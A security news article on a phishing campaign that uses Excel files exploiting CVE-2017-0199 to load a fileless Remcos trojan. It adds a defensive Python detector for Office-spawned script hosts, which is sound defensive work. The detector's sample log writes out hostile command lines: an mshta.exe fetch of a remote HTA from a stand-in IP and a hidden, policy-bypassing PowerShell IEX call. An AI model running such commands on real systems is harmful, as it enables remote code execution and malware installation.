Tue Nov 12 2024

Beware, that Excel document could be infected with dangerous malware.

An Excel file containing fileless malware is circulating widely.

Recently, a new phishing campaign has been identified that involves the distribution of an Excel file. This file is designed to install a fileless version of the Remcos remote access trojan on the victims' devices. Remcos is capable of stealing sensitive information, logging keystrokes, and more.

Researchers have observed cybercriminals sending phishing emails with the familiar purchase-order subject line. The emails carry a Microsoft Excel file that exploits a remote code execution vulnerability in Office, CVE-2017-0199, a flaw Microsoft patched in April 2017. When the file is opened, Excel fetches an HTML Application (HTA) file from a remote server and runs it with mshta.exe. The HTA in turn downloads a second-stage loader from the same server; that loader performs anti-analysis and anti-debugging checks before downloading the Remcos payload and executing it.

Historically, Remcos has not always been classified as malware; it was originally developed as legitimate commercial software for remote administration tasks. However, like other programs such as Cobalt Strike, it has been co-opted by cybercriminals and is primarily used for unauthorized access, data theft, and espionage. Remcos has the ability to log keystrokes, capture screenshots, and execute commands on infected systems.

What sets this version of Remcos apart is that it is deployed directly in the device's memory: "Instead of saving the Remcos file in a local location and executing it, it is deployed directly in the memory of the current process," experts explained. "In other words, it is a fileless variant of Remcos."
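Because the final Remcos stage never touches disk, file-based scanning has little to work with; what does survive is the process lineage described above (Excel launching mshta.exe with a remote URL, and mshta.exe launching a second stage). The following is an added example, not code from the original article or from the researchers who reported the campaign: a small Python detector that parses constructed, Sysmon-style process-creation lines (the key=value layout, the IP address 203.0.113.10 and the file names are invented for illustration) and flags script hosts whose parent chain leads back to an Office application.

```python
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Office applications that should not normally spawn script hosts.
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# mshta.exe is the host abused in this campaign; the others are common second stages.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Constructed sample telemetry (assumption: one process-creation event per line).
# Lines 2-4 mirror the chain on this page; line 5 is a benign, user-launched local HTA.
SAMPLE_LOG = r'''
pid=4120 ppid=812 image="C:\Windows\explorer.exe" cmdline="explorer.exe"
pid=5200 ppid=4120 image="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" cmdline="EXCEL.EXE purchase_order.xlsx"
pid=5316 ppid=5200 image="C:\Windows\System32\mshta.exe" cmdline="mshta.exe http://203.0.113.10/invoice.hta"
pid=5330 ppid=5316 image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmdline="powershell.exe -w hidden -ep bypass -c IEX(...)"
pid=6000 ppid=4120 image="C:\Windows\System32\mshta.exe" cmdline="mshta.exe C:\Users\alice\AppData\Local\Temp\installer.hta"
'''


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str

    @property
    def name(self) -> str:
        # ntpath handles Windows paths regardless of the host OS running the detector.
        return ntpath.basename(self.image).lower()


def parse_events(text: str) -> Dict[int, ProcEvent]:
    """Parse key=value lines into a pid -> event map (quoted values may contain spaces)."""
    events: Dict[int, ProcEvent] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        kv = {m.group(1): (m.group(2) if m.group(2) is not None else m.group(3))
              for m in KV_RE.finditer(line)}
        ev = ProcEvent(int(kv["pid"]), int(kv["ppid"]), kv["image"], kv.get("cmdline", ""))
        events[ev.pid] = ev
    return events


def office_ancestor(ev: ProcEvent, events: Dict[int, ProcEvent],
                    max_depth: int = 3) -> Optional[ProcEvent]:
    """Walk up the parent chain and return the first Office app within max_depth hops."""
    cur = ev
    for _ in range(max_depth):
        parent = events.get(cur.ppid)
        if parent is None:
            return None
        if parent.name in OFFICE_APPS:
            return parent
        cur = parent
    return None


def detect_chain(text: str) -> List[dict]:
    """Return one alert per script host that descends from an Office application."""
    events = parse_events(text)
    alerts = []
    for ev in events.values():
        if ev.name not in SCRIPT_HOSTS:
            continue
        origin = office_ancestor(ev, events)
        if origin is None:
            continue  # e.g. a user double-clicking a local HTA from Explorer
        severity = "medium"
        reasons = [f"{origin.name} spawned {ev.name}"]
        url = URL_RE.search(ev.cmdline)
        if ev.name == "mshta.exe" and url:
            severity = "high"  # remote HTA: matches the CVE-2017-0199 delivery stage
            reasons.append(f"mshta.exe fetching remote HTA: {url.group(0)}")
        direct_parent = events.get(ev.ppid)
        if direct_parent is not None and direct_parent.name == "mshta.exe":
            severity = "high"  # second stage launched by the HTA itself
            reasons.append("second stage launched by mshta.exe")
        alerts.append({"pid": ev.pid, "process": ev.name,
                       "severity": severity, "reasons": reasons})
    return sorted(alerts, key=lambda a: a["pid"])


if __name__ == "__main__":
    for alert in detect_chain(SAMPLE_LOG):
        print(alert)
```

Run against the sample, the detector raises two high-severity alerts (the mshta.exe process fetching the remote HTA, and the PowerShell second stage it launched) and stays silent on the HTA started from Explorer. The ancestor walk is what matters: the in-memory payload leaves no file to hash, but it cannot hide which process tree it lives in.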

Email phishing remains one of the most common ways cybercriminals deliver malware and steal sensitive information: it is cheap, scales well, and keeps working. User caution with unexpected attachments, especially ones that arrive under a generic purchase-order pretext, is the first line of defense, but it should not be the only one. The flaw this campaign exploits, CVE-2017-0199, was patched in 2017, so an Office installation that is fully up to date is not vulnerable to the initial stage, and preventing Office applications from launching child processes such as mshta.exe breaks the chain even if a user does open the document.